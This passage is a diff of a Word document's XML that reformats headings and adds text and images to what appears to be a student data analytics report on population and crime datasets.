+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Preparation and Visualization</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_Toc59959347"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">1.1 </w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve">Data </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Wrangling</w:t>
       </w:r>
@@ -5176,29 +5314,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Phase 01 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-  Data</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Wrangling</w:t>
+        <w:t>Phase 01 -  Data Wrangling</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5335,107 +5451,117 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve">1.2 </w:t>
       </w:r>
       <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve">1 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Exploratory</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>D</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve">ata </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>A</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>nalysis</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t xml:space="preserve"> (EDA) Method and Insights</w:t>
       </w:r>
@@ -5625,6 +5751,265 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">After the first process, “Data Wrangling”, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>population_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dataset is shown </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bellow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760C44C2" wp14:editId="23D07A46">
+            <wp:extent cx="5253317" cy="2486577"/>
+            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
+            <wp:docPr id="303618801" name="Picture 1" descr="A table with numbers and lines&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="303618801" name="Picture 1" descr="A table with numbers and lines&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5263395" cy="2491347"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dataset is shown </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bellow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6348650D" wp14:editId="19051A44">
+            <wp:extent cx="3200651" cy="2397812"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="101363319" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="101363319" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3210121" cy="2404906"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -5643,6 +6028,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -5652,8 +6038,8 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
         <w:t>Performing the EDA:</w:t>
       </w:r>
     </w:p>
@@ -5700,9 +6086,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> MSC_DA_CA1_Jose_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> MSC_DA_CA1_Jose_Mario.ipynb</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5711,7 +6096,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Mario.ipynb</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5726,11 +6111,67 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and it was called</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -5739,99 +6180,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it was called</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Visualization</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
